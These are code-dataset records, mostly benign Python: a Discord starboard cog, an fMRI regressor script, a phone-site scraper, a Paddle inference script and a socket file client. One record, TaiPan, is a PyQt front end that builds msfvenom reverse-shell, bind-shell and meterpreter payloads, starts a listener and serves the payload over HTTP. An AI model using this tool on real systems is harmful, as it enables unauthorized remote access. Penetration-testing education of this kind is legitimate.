starboard_msg.edit(embed=embed)\n else:\n sent_msg = await starboard_channel.send(embed=embed)\n if \"messages\" not in starboard_data:\n starboard_data[\"messages\"] = {}\n starboard_data[\"messages\"][str(message.id)] = sent_msg.id\n self.mongo_db.starboard.update_one({\"guild_id\": str(payload.guild_id)}, {\"$set\": starboard_data})\n break\n\n @commands.Cog.listener()\n async def on_raw_reaction_remove(self, payload):\n if not payload.guild_id:\n return\n\n starboard_data = self.mongo_db.starboard.find_one({\"guild_id\": str(payload.guild_id)})\n if not starboard_data or str(payload.emoji) != starboard_data[\"emoji\"]:\n return\n\n channel = self.bot.get_channel(payload.channel_id)\n message = await channel.fetch_message(payload.message_id)\n\n emoji_found = False\n\n for reaction in message.reactions:\n if str(reaction.emoji) == starboard_data[\"emoji\"]:\n emoji_found = True\n if reaction.count < starboard_data[\"count\"]:\n starboard_msg_id = starboard_data.get(\"messages\", {}).get(str(message.id))\n if starboard_msg_id:\n starboard_channel = self.bot.get_channel(int(starboard_data[\"channel_id\"]))\n try:\n starboard_msg = await starboard_channel.fetch_message(starboard_msg_id)\n print(\"Starboard Message to delete:\", starboard_msg)\n await starboard_msg.delete()\n except Exception as e:\n print(\"Error:\", e)\n del starboard_data[\"messages\"][str(message.id)]\n self.mongo_db.starboard.update_one({\"guild_id\": str(payload.guild_id)},\n {\"$set\": starboard_data})\n break\n\n # Eğer ilgili emoji message.reactions içinde bulunamazsa, bu demek oluyor ki reaksiyon sayısı 0'dır.\n if not emoji_found:\n starboard_msg_id = starboard_data.get(\"messages\", {}).get(str(message.id))\n if starboard_msg_id:\n starboard_channel = self.bot.get_channel(int(starboard_data[\"channel_id\"]))\n try:\n starboard_msg = await starboard_channel.fetch_message(starboard_msg_id)\n print(\"Starboard Message to delete:\", starboard_msg)\n await starboard_msg.delete()\n except Exception as e:\n print(\"Error:\", e)\n del starboard_data[\"messages\"][str(message.id)]\n self.mongo_db.starboard.update_one({\"guild_id\": str(payload.guild_id)}, {\"$set\": starboard_data})\n\n @commands.hybrid_command(name=\"add_starboard\", description=\"Add starboard to your server.\")\n async def add_starboard(self, ctx, channel: discord.TextChannel, emoji: str, count: int):\n # Starboard ayarını ekleyin veya güncelleyin\n self.mongo_db.starboard.update_one(\n {\"guild_id\": str(ctx.guild.id)},\n {\n \"$set\": {\n \"channel_id\": str(channel.id),\n \"emoji\": emoji,\n \"count\": count\n }\n },\n upsert=True\n )\n\n await ctx.send(embed=create_embed(\n description=f\"Starboard set up successfully in {channel.mention} with {emoji} and {count} reactions!\",\n color=discord.Color.green()))\n\n @commands.hybrid_command(name=\"remove_starboard\", description=\"Remove starboard from your server.\")\n async def remove_starboard(self, ctx):\n self.mongo_db.starboard.delete_one({\"guild_id\": str(ctx.guild.id)})\n await ctx.send(embed=create_embed(description=\"Starboard system has been removed from this server.\",\n color=discord.Color.green()))\n\n\nasync def setup(bot):\n await bot.add_cog(Starboard(bot))","repo_name":"bergaman9/contro-bot","sub_path":"cogs/starboard.py","file_name":"starboard.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"33701268469","text":"#!/usr/bin/python3\r\n# -*- coding: utf-8 -*-\r\n\r\n# Created by 
Ethical Hacker Project\r\n\r\nimport os\r\nimport sys\r\n\r\nfrom PyQt5.QtGui import QFont,QIcon, QPixmap,QMovie\r\nfrom PyQt5.QtWidgets import QWidget,QApplication,QMessageBox,QLabel,QComboBox,QPushButton,QRadioButton,QLineEdit,QFileDialog,QCheckBox\r\nfrom PyQt5.QtCore import QRect,QCoreApplication,QMetaObject,Qt\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nimport subprocess\r\n\r\n\r\n\r\n\r\n#payloads list\r\n#windows payloads\r\nwindows_payloads = [\r\n 'shell_reverse_tcp', \r\n 'shell_bind_tcp', \r\n]\r\n\r\n#linux payloads\r\nlinux_payloads = [\r\n 'shell_reverse_tcp', \r\n 'shell_bind_tcp', \r\n]\r\n\r\n#web payloads\r\nweb_reverse_payloads = [\r\n 'php',\r\n 'asp',\r\n 'jsp',\r\n 'war'\r\n]\r\n\r\n#script payloads\r\nscript_reverse_payloads = [\r\n 'bash',\r\n 'python',\r\n 'perl',\r\n 'nodejs',\r\n 'jar'\r\n]\r\n\r\n#global payloads settings\r\nglobal msfvenom_command\r\nglobal p_payload\r\nglobal p_arch\r\nglobal LHOST\r\nglobal LPORT\r\nglobal RHOST\r\nglobal RPORT\r\n\r\n\r\n\r\nclass Ui_Form(object):\r\n def setupUi(self, Form):\r\n Form.setObjectName(\"Form\")\r\n Form.resize(537, 428)\r\n font = QFont()\r\n font.setFamily(\"Old Antic Bold\") #font family\r\n font.setStrikeOut(False)\r\n Form.setFont(font)\r\n self.label = QLabel(Form)\r\n self.label.setGeometry(QRect(20, 100, 101, 31)) #x,y,widht,height\r\n font = QFont()\r\n font.setPointSize(13)\r\n font.setBold(False)\r\n font.setWeight(50)\r\n self.label.setFont(font)\r\n self.label.setTextFormat(Qt.AutoText)\r\n self.label.setObjectName(\"label\")\r\n self.label_3 = QLabel(Form)\r\n self.label_3.setGeometry(QRect(20, 150, 91, 21))\r\n font = QFont()\r\n font.setPointSize(13)\r\n font.setBold(False)\r\n font.setWeight(50)\r\n self.label_3.setFont(font)\r\n self.label_3.setObjectName(\"label_2\")\r\n self.label_2 = QLabel(Form)\r\n self.label_2.setGeometry(QRect(20, 190, 91, 20))\r\n font = QFont()\r\n font.setPointSize(13)\r\n self.label_2.setFont(font)\r\n self.label_2.setObjectName(\"label_3\")\r\n self.comboBox_platform = QComboBox(Form) #combobox --> dropdown menu\r\n self.comboBox_platform.setGeometry(QRect(130, 100, 181, 31))\r\n font = QFont()\r\n font.setStrikeOut(False)\r\n self.comboBox_platform.setFont(font)\r\n self.comboBox_platform.setMouseTracking(False)\r\n self.comboBox_platform.setAutoFillBackground(True)\r\n self.comboBox_platform.setObjectName(\"comboBox_platform\")\r\n self.comboBox_platform.addItem(\"\")\r\n self.comboBox_platform.addItem(\"\")\r\n self.comboBox_platform.addItem(\"\")\r\n self.comboBox_platform.addItem(\"\")\r\n self.pushButton = QPushButton(Form)\r\n self.pushButton.setGeometry(QRect(90, 400, 151, 41))\r\n self.pushButton.setObjectName(\"pushButton\")\r\n self.pushButton_2 = QPushButton(Form)\r\n self.pushButton_2.setGeometry(QRect(410, 400, 151, 41))\r\n self.pushButton_2.setObjectName(\"pushButton_2\")\r\n self.label_4 = QLabel(Form)\r\n self.label_4.setGeometry(QRect(150, 20, 250, 51))\r\n font = QFont()\r\n font.setFamily(\"Old Antic Bold\")\r\n font.setPointSize(27)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.label_4.setFont(font)\r\n self.label_4.setObjectName(\"label_4\")\r\n self.comboBox_payload = QComboBox(Form)\r\n self.comboBox_payload.setGeometry(QRect(130, 190, 271, 31))\r\n self.comboBox_payload.setObjectName(\"comboBox_payload\")\r\n self.radioButton_86 = QRadioButton(Form)\r\n self.radioButton_86.setGeometry(QRect(130, 150, 119, 25))\r\n self.radioButton_86.setObjectName(\"radioButton_86\") #architecture radio button\r\n self.radioButton_64 = 
QRadioButton(Form)\r\n self.radioButton_64.setGeometry(QRect(250, 150, 119, 25))\r\n self.radioButton_64.setChecked(True)\r\n self.radioButton_64.setObjectName(\"radioButton_64\")\r\n self.label_5 = QLabel(Form)\r\n self.label_5.setGeometry(QRect(20, 235, 91, 31))\r\n font = QFont()\r\n font.setPointSize(13)\r\n self.label_5.setFont(font)\r\n self.label_5.setObjectName(\"label_5\")\r\n self.label_6 = QLabel(Form)\r\n self.label_6.setGeometry(QRect(290, 280, 71, 21))\r\n self.label_6.setObjectName(\"label_6\")\r\n self.label_7 = QLabel(Form)\r\n self.label_7.setGeometry(QRect(290, 325, 71, 20))\r\n self.label_7.setObjectName(\"label_7\")\r\n self.label_8 = QLabel(Form)\r\n self.label_8.setGeometry(QRect(60, 280, 71, 20))\r\n self.label_8.setObjectName(\"label_8\")\r\n self.label_9 = QLabel(Form)\r\n self.label_9.setGeometry(QRect(60, 325, 71, 20))\r\n self.label_9.setObjectName(\"label_9\")\r\n self.lineEdit_lhost = QLineEdit(Form)\r\n self.lineEdit_lhost.setGeometry(QRect(130, 280, 131, 21))\r\n self.lineEdit_lhost.setObjectName(\"lineEdit_lhost\")\r\n self.lineEdit_lport = QLineEdit(Form)\r\n self.lineEdit_lport.setGeometry(QRect(130, 325, 131, 21))\r\n self.lineEdit_lport.setObjectName(\"lineEdit_lport\")\r\n self.lineEdit_rhost = QLineEdit(Form)\r\n self.lineEdit_rhost.setGeometry(QRect(360, 280, 141, 21))\r\n self.lineEdit_rhost.setObjectName(\"lineEdit_rhost\")\r\n self.lineEdit_rport = QLineEdit(Form)\r\n self.lineEdit_rport.setGeometry(QRect(360, 325, 141, 21))\r\n self.lineEdit_rport.setObjectName(\"lineEdit_rport\")\r\n self.pushButton_3 = QPushButton(Form)\r\n self.pushButton_3.setGeometry(QRect(250, 400, 151, 41))\r\n self.pushButton_3.setObjectName(\"pushButton_3\")\r\n\r\n #Fixed image on screen\r\n #self.label_10 = QLabel(Form)\r\n #self.label_10.setGeometry(QtCore.QRect(400, 25, 250, 250))\r\n #self.label_10.setText(\"\")\r\n #self.label_10.setPixmap(QtGui.QPixmap(\"logo2.png\"))\r\n #self.label_10.setScaledContents(True)\r\n\r\n #Animated GIF on screen\r\n self.label_10 = QtWidgets.QLabel(Form)\r\n self.label_10.setGeometry(QtCore.QRect(400, 25, 250, 250))\r\n self.label_10.setObjectName(\"label_10\")\r\n #self.retranslateUi(Form)\r\n \r\n self.retranslateUi(Form)\r\n self.comboBox_platform.currentIndexChanged['int'].connect(Form.setPlatform)\r\n self.pushButton_2.clicked.connect(Form.ExitTool)\r\n self.radioButton_86.clicked.connect(Form.setArch)\r\n self.radioButton_64.clicked.connect(Form.setArch)\r\n self.pushButton.clicked.connect(Form.GeneratePayload)\r\n self.pushButton_3.clicked.connect(Form.pythonServer)\r\n #QMetaObject.connectSlotsByName(Form) #commented out for animated gif\r\n QtCore.QMetaObject.connectSlotsByName(Form)\r\n\r\n def retranslateUi(self, Form):\r\n #translating labels to text\r\n _translate = QtCore.QCoreApplication.translate\r\n #_translate = QCoreApplication.translate #commented out for animated gif\r\n Form.setWindowTitle(_translate(\"Form\", \"Form\"))\r\n self.label.setText(_translate(\"Form\", \"OS\"))\r\n self.label_2.setText(_translate(\"Form\", \"Payload\"))\r\n self.label_3.setText(_translate(\"Form\", \"Arch\"))\r\n self.comboBox_platform.setItemText(0, _translate(\"Form\", \"Windows\"))\r\n self.comboBox_platform.setItemText(1, _translate(\"Form\", \"Linux\")) \r\n self.comboBox_platform.setItemText(2, _translate(\"Form\", \"Web_Reverse_Shell\"))\r\n self.comboBox_platform.setItemText(3, _translate(\"Form\", \"Script_Reverse_Shell\"))\r\n self.pushButton.setText(_translate(\"Form\", \"Generate\"))\r\n 
self.pushButton_2.setText(_translate(\"Form\", \"Exit\"))\r\n self.label_4.setText(_translate(\"Form\", \"TaiPan v1.0\"))\r\n self.radioButton_86.setText(_translate(\"Form\", \"x86\"))\r\n self.radioButton_64.setText(_translate(\"Form\", \"x64\"))\r\n self.label_5.setText(_translate(\"Form\", \"Parameters\"))\r\n self.label_6.setText(_translate(\"Form\", \"RHOST\"))\r\n self.label_7.setText(_translate(\"Form\", \"RPORT\"))\r\n self.label_8.setText(_translate(\"Form\", \"LHOST\"))\r\n self.label_9.setText(_translate(\"Form\", \"LPORT\"))\r\n self.pushButton_3.setText(_translate(\"Form\", \"Serve Payload\"))\r\n\r\nclass Mywindow(QWidget,Ui_Form):\r\n \r\n def __init__(self): \r\n super(Mywindow,self).__init__()\r\n self.setStyleSheet(\"background-color: #2B2D2F; color: white \") ##39ff14\r\n self.setFixedSize(640, 480) #fixed size for main window\r\n self.setupUi(self)\r\n self.comboBox_payload.addItems(windows_payloads)\r\n self.msfvenom_command = \"\"\r\n self.p_arch = self.setArch()\r\n self.p_payload = \"\"\r\n self.LHOST=\"\"\r\n self.LPORT=\"\"\r\n self.RHOST=\"\"\r\n self.RPORT=\"\"\r\n self.FILENAME=\"\"\r\n\r\n #Animation for GIF\r\n self.gif = QMovie('venom_face3.gif')\r\n self.label_10.setMovie(self.gif)\r\n self.gif.start()\r\n\r\n #Define slot function\r\n def setPlatform(self):\r\n if self.comboBox_platform.currentText()== \"Windows\":\r\n self.comboBox_payload.clear()\r\n self.comboBox_payload.addItems(windows_payloads)\r\n\r\n elif self.comboBox_platform.currentText()== \"Linux\":\r\n self.comboBox_payload.clear()\r\n self.comboBox_payload.addItems(linux_payloads)\r\n\r\n elif self.comboBox_platform.currentText()== \"Web_Reverse_Shell\":\r\n self.comboBox_payload.clear()\r\n self.comboBox_payload.addItems(web_reverse_payloads)\r\n\r\n elif self.comboBox_platform.currentText()== \"Script_Reverse_Shell\":\r\n self.comboBox_payload.clear()\r\n self.comboBox_payload.addItems(script_reverse_payloads)\r\n\r\n def setArch(self):\r\n if self.radioButton_64.isChecked():\r\n return \"x64\"\r\n elif self.radioButton_86.isChecked():\r\n return \"x86\"\r\n \r\n def ExitTool(self):\r\n QCoreApplication.instance().quit()\r\n\r\n def GeneratePayload(self):\r\n self.setPayloadSettings()\r\n\r\n try:\r\n #payload will be saved on the tmp folder\r\n file_name,ok=QFileDialog.getSaveFileName(self,'Save','/tmp')\r\n if ok:\r\n f=open(file_name,'w')\r\n \r\n except :\r\n pass\r\n self.msfvenom_command = self.msfvenom_command + \" > \" + file_name\r\n self.FILENAME = file_name\r\n subprocess.call(['chmod', '0777', file_name]) #automates file created into executable\r\n \r\n # debug infomation\r\n print(self.msfvenom_command)\r\n print(self.p_payload)\r\n print(self.LHOST,self.LPORT)\r\n print(self.RHOST,self.RPORT)\r\n\r\n QMessageBox.about(self, \"The Ethical Hacker Project\", \"Generating payload\")\r\n if os.system(self.msfvenom_command) == 0:\r\n QMessageBox.about(self, \"The Ethical Hacker Project\", \"Successfully generated payload!\")\r\n #os.system('gnome-terminal -- nc -lvp ' +self.lineEdit_lport.text() ) # --> Uncomment if you rather use nc listener\r\n dirpath = os.getcwd() # gets current working directory \r\n #opens new terminal with a python listener\r\n subprocess.call(['gnome-terminal', '-e', 'python3 '+ dirpath + '/listener.py '+ str(self.lineEdit_lport.text())])\r\n else:\r\n QMessageBox.about(self,\"The Ethical Hacker Project\", \"Failed to generate payload!\")\r\n\r\n #PythonServer port 80\r\n def pythonServer(self):\r\n os.system('gnome-terminal -- python -m SimpleHTTPServer 
80')\r\n QMessageBox.about(self, \"URL TO PAYLOAD\",\"http://\"+self.lineEdit_lhost.text()+self.FILENAME)\r\n\r\n\r\n def setPayloadSettings(self):\r\n #Windows payload\r\n if self.comboBox_platform.currentText()== \"Windows\":\r\n if self.comboBox_payload.currentText() == \"messagebox\":\r\n self.p_payload = \"windows/\"+self.comboBox_payload.currentText()\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" TEXT=\"+\"\\'hello, it is a test\\'\"+\" -f exe\"\r\n \r\n elif self.comboBox_payload.currentText() == \"shell_bind_tcp\":\r\n self.RHOST = self.lineEdit_rhost.text()\r\n self.RPORT = self.lineEdit_rport.text()\r\n if self.p_arch == 'x86':\r\n self.p_payload = \"windows/\"+self.comboBox_payload.currentText()\r\n else:\r\n self.p_payload = \"windows/\"+self.p_arch+\"/\"+self.comboBox_payload.currentText()\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" RHOST=\"+ self.lineEdit_lhost.text()+ \" RPORT=\"+ self.lineEdit_lport.text()+\" -f exe\"\r\n else:\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n if self.p_arch == 'x86':\r\n self.p_payload = \"windows/\"+self.comboBox_payload.currentText()\r\n else:\r\n self.p_payload = \"windows/\"+self.p_arch+\"/\"+self.comboBox_payload.currentText()\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f exe\"\r\n\r\n #Linux payload\r\n elif self.comboBox_platform.currentText()== \"Linux\":\r\n if self.comboBox_payload.currentText() == \"shell_bind_tcp\":\r\n self.RHOST = self.lineEdit_rhost.text()\r\n self.RPORT = self.lineEdit_rport.text()\r\n self.p_payload = \"linux/\"+self.p_arch+\"/\"+self.comboBox_payload.currentText()\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" RHOST=\"+ self.lineEdit_lhost.text()+ \" RPORT=\"+ self.lineEdit_lport.text()+\" -f elf\"\r\n else:\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"linux/\"+self.p_arch+\"/\"+self.comboBox_payload.currentText()\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f elf\"\r\n\r\n #Web Reverse payload\r\n elif self.comboBox_platform.currentText()== \"Web_Reverse_Shell\":\r\n if self.comboBox_payload.currentText() == \"php\":\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"php/reverse_php\"\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f raw\"\r\n\r\n elif self.comboBox_payload.currentText() == \"jsp\":\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"java/jsp_shell_reverse_tcp\"\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f raw\"\r\n\r\n elif self.comboBox_payload.currentText() == \"asp\":\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"windows/meterpreter/reverse_tcp\"\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f asp\"\r\n\r\n elif self.comboBox_payload.currentText() == \"war\":\r\n self.LHOST = 
self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"java/jsp_shell_reverse_tcp\"\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f war\"\r\n\r\n #Script Reverse payload\r\n elif self.comboBox_platform.currentText()== \"Script_Reverse_Shell\":\r\n if self.comboBox_payload.currentText() == \"bash\":\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"cmd/unix/reverse_bash\"\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f raw\"\r\n elif self.comboBox_payload.currentText() == \"python\":\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"python/shell_reverse_tcp\"\r\n self.msfvenom_command = \"msfvenom\"+\" -a python\"+\" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f raw\"\r\n elif self.comboBox_payload.currentText() == \"perl\":\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"cmd/unix/reverse_perl\"\r\n self.msfvenom_command = \"msfvenom\"+\" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f raw\"\r\n elif self.comboBox_payload.currentText() == \"nodejs\":\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"cmd/unix/reverse_nodejs\"\r\n self.msfvenom_command = \"msfvenom\"+\" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f raw\"\r\n elif self.comboBox_payload.currentText() == \"jar\":\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"java/shell_reverse_tcp\"\r\n self.msfvenom_command = \"msfvenom\"+\" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f jar\"\r\ndef main():\r\n app = QApplication(sys.argv)\r\n window = Mywindow()\r\n window.setWindowTitle(\"By The Ethical Hacker Project\")\r\n window.setWindowIcon(QIcon('logo.jpg'))\r\n window.show()\r\n sys.exit(app.exec_())\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n \r\n\r\n","repo_name":"ethicalhackerproject/TaiPan","sub_path":"TaiPan_v1.0.py","file_name":"TaiPan_v1.0.py","file_ext":"py","file_size_in_byte":18344,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"} +{"seq_id":"2339317050","text":"import os\nfrom pathlib import Path\n\nimport pandas as pd\nimport numpy as np\n\nhome = str(Path.home())\np = Path(home + \"/projects/critchley_depersonalisation\")\nparticipants = pd.read_csv(p / \"code\" / \"participants.tsv\", sep=\"\\t\", index_col=0)\nregressors = participants.iloc[:, :2]\nregressors[\"mean_fd\"] = np.nan\n\nfor idx, row in regressors.iterrows():\n subject = idx\n print(subject)\n path = list(\n p.glob(\n f\"data/derivatives/fmriprep-1.5.1rc2/{subject}/func/{subject}_task-heartbeat_run-1_desc-confounds_regressors.tsv\"\n )\n )\n confounds_path = path[0]\n confounds = pd.read_csv(confounds_path, sep=\"\\t\")\n mean_fd = confounds.loc[5:, \"framewise_displacement\"].mean()\n regressors.loc[idx, \"mean_fd\"] = mean_fd\n\nstats = pd.read_csv(p / \"results\" / \"full_sample_stats.tsv\", sep=\"\\t\", 
index_col=0)\ncds = stats.CDS_State\n\n# concatenate cds and the rest\nregressors = pd.concat([regressors, cds], axis=1, join=\"inner\")\n\n# create z test var\nfor c in [\"control\", \"patient\"]:\n regressors[c] = 0\n regressors[c][regressors.group == c] = 1\nregressors.group = 1\n\n# z score\nz_convert = [\"age\", \"mean_fd\", \"CDS_State\"]\nregressors[z_convert] -= regressors[z_convert].mean()\nregressors[z_convert] /= regressors[z_convert].std(ddof=0)\n\n# sort by group\nregressors = regressors.sort_index()\nregressors = regressors.sort_values(by=[\"patient\"])\n\n# save file\nout_file = p / \"scripts\" / \"group_design\" / \"mri_regressors.tsv\"\nregressors.to_csv(out_file, sep=\"\\t\", float_format=\"%.5f\")\n","repo_name":"htwangtw/depersonalisation","sub_path":"scripts/src/fsl_group_regressors.py","file_name":"fsl_group_regressors.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25347183014","text":"'''\nTHIS PROGRAM OPENS THE GSMARENA PAGE WHICH ENLISTS ALL OF THE MAKERS OF MOBILE PHONES AND DEVICES.\n\nTHE SCRAPER FIRST SAVES ALL OF THE INDIVIDUAL LINKS. (101 IN NUMBER)\n\nTHE SCRAPER THEN STORES THESE URLs IN A TEXT FILE \"PHONE_URL.TXT\".\n\n'''\n\n\nfrom bs4 import BeautifulSoup\nimport requests\n\nurl = 'http://www.gsmarena.com/makers.php3'\nr = requests.get(url)\ndata = r.text\nsoup = BeautifulSoup(data)\n\nB = soup.find_all(\"table\")\nmanu_links = []\nlinks = B[0].find_all('a')\nfor l in links[::2]:\n manu_links.append(l['href'])\n\nI = len(manu_links)\n\nfor i in range(I):\n ml = manu_links[i]\n url = 'http://www.gsmarena.com/'+ml\n r = requests.get(url)\n data = r.text\n soup = BeautifulSoup(data)\n phonetabs = soup.find_all(\"div\",{\"class\":\"makers\"})\n phone_links=[]\n for p in phonetabs:\n link = p.find_all('a')\n for l in link:\n phone_links.append(l['href'])\n f = open(\"phones_urls.txt\",\"a\")\n for p in phone_links:\n f.write(p+\",\")\n f.close()\n","repo_name":"maximus009/Scraper","sub_path":"phone_links_retrieve.py","file_name":"phone_links_retrieve.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"30726319464","text":"import os\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import cohen_kappa_score\n\nimport paddle\nimport paddle.nn as nn\nimport paddle.nn.functional as F\nfrom paddle.vision.models import resnet34\nfrom model import Model\nimport paddle.vision.transforms as trans\nfrom dataset import GAMMA_sub1_dataset\nimport warnings\nwarnings.filterwarnings('ignore')\n\nbatchsize = 1 # 4 patients per iter, i.e, 20 steps / epoch\noct_img_size = [512, 512]\nimage_size = 256\niters = 1000 # For demonstration purposes only, far from reaching convergence\nval_ratio = 0.2 # 80 / 20\ntrainset_root = \"\"\ntest_root = \"E:\\\\multi-modal-resnet\\\\multi-modality_images\"\nnum_workers = 0\ninit_lr = 1e-4\noptimizer_type = \"adam\"\n\nbest_model_path = \"./best_model_0.8649/model.pdparams\"\nmodel = Model()\npara_state_dict = paddle.load(best_model_path)\nmodel.set_state_dict(para_state_dict)\nmodel.eval()\n\n\n\nimg_test_transforms = trans.Compose([\n # trans.CropCenterSquare(),\n trans.Resize((image_size, image_size))\n])\n\noct_test_transforms = trans.Compose([\n # trans.CenterCrop([256] + oct_img_size)\n])\n\ntest_dataset = 
GAMMA_sub1_dataset(dataset_root=test_root,\n img_transforms=img_test_transforms,\n oct_transforms=None,\n mode='test')\n\ncache = []\nfor fundus_img, oct_img, idx in test_dataset:\n fundus_img = fundus_img[np.newaxis, ...]\n oct_img = oct_img[np.newaxis, ...]\n\n fundus_img = paddle.to_tensor((fundus_img / 255.).astype(\"float32\"))\n oct_img = paddle.to_tensor((oct_img / 255.).astype(\"float32\"))\n\n logits = model(fundus_img, oct_img)\n cache.append([idx, logits.numpy().argmax(1)])\n print(idx)\n\nsubmission_result = pd.DataFrame(cache, columns=['data', 'dense_pred'])\nsubmission_result['non'] = submission_result['dense_pred'].apply(lambda x: int(x[0] == 0))\nsubmission_result['early'] = submission_result['dense_pred'].apply(lambda x: int(x[0] == 1))\nsubmission_result['mid_advanced'] = submission_result['dense_pred'].apply(lambda x: int(x[0] == 2))\nsubmission_result[['data', 'non', 'early', 'mid_advanced']].to_csv(\"./submission_sub1.csv\", index=False)\n\n","repo_name":"a2824256/multi-modal-resnet","sub_path":"infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"16198562886","text":"import socket\nimport threading\nimport sys\nimport os\n\n#Wait for incoming data from server\n#.decode is used to turn the message in bytes to a string\ndef receive(socket, signal):\n while signal:\n try:\n data = socket.recv(32)\n print(str(data.decode(\"utf-8\")))\n except:\n print(\"You have been disconnected from the server\")\n signal = False\n break\n#------------------------------------------------------------------\ndef helping():\n print(\"-----------------------------------\\n\")\n print(\"To receive files from the server:\\n\")\n print(\"start with command (recv)\")\n print(\"-----------------------------------\\n\")\n print(\"To list all the files in the server:\\n\")\n print(\"use the command (list)\")\n print(\"-----------------------------------\\n\")\n#------------------------------------------------------------------\n\n#Get host and port\nhost = input(\"Host: \")\nport = int(input(\"Port: \"))\n\n#Attempt connection to server\ntry:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((host, port))\nexcept:\n print(\"Could not make a connection to the server\")\n input(\"Press enter to quit\")\n sys.exit(0)\n\n#Create new thread to wait for data\nreceiveThread = threading.Thread(target = receive, args = (sock, True))\nreceiveThread.start()\n\n#Send data to server\n#str.encode is used to turn the string message into bytes so it can be sent across the network\nwhile True:\n def find_folder():\n folder = input(\"Now choose the folder>\")\n sock.sendall(str.encode(folder))\n file = open(\"/home/uniquare/Desktop/project/files_received/\"+folder, mode=\"w\", encoding=\"utf-8\") \n RecvData = sock.recv(1024)\n file.write(str(RecvData.decode(\"utf-8\")))\n file.close()\n\n#Define the input provided by the user\n cmd = input(\"input_command>\")\n \n if cmd == \"recv\":\n specify = input(\"Choose a file after listing using the command (list)>\")\n if specify == \"list\":\n print(os.listdir(\"/home/uniquare/Desktop/project/files_to_send\"))\n find_folder()\n\n choice = input(\"do you want to recv another file? 
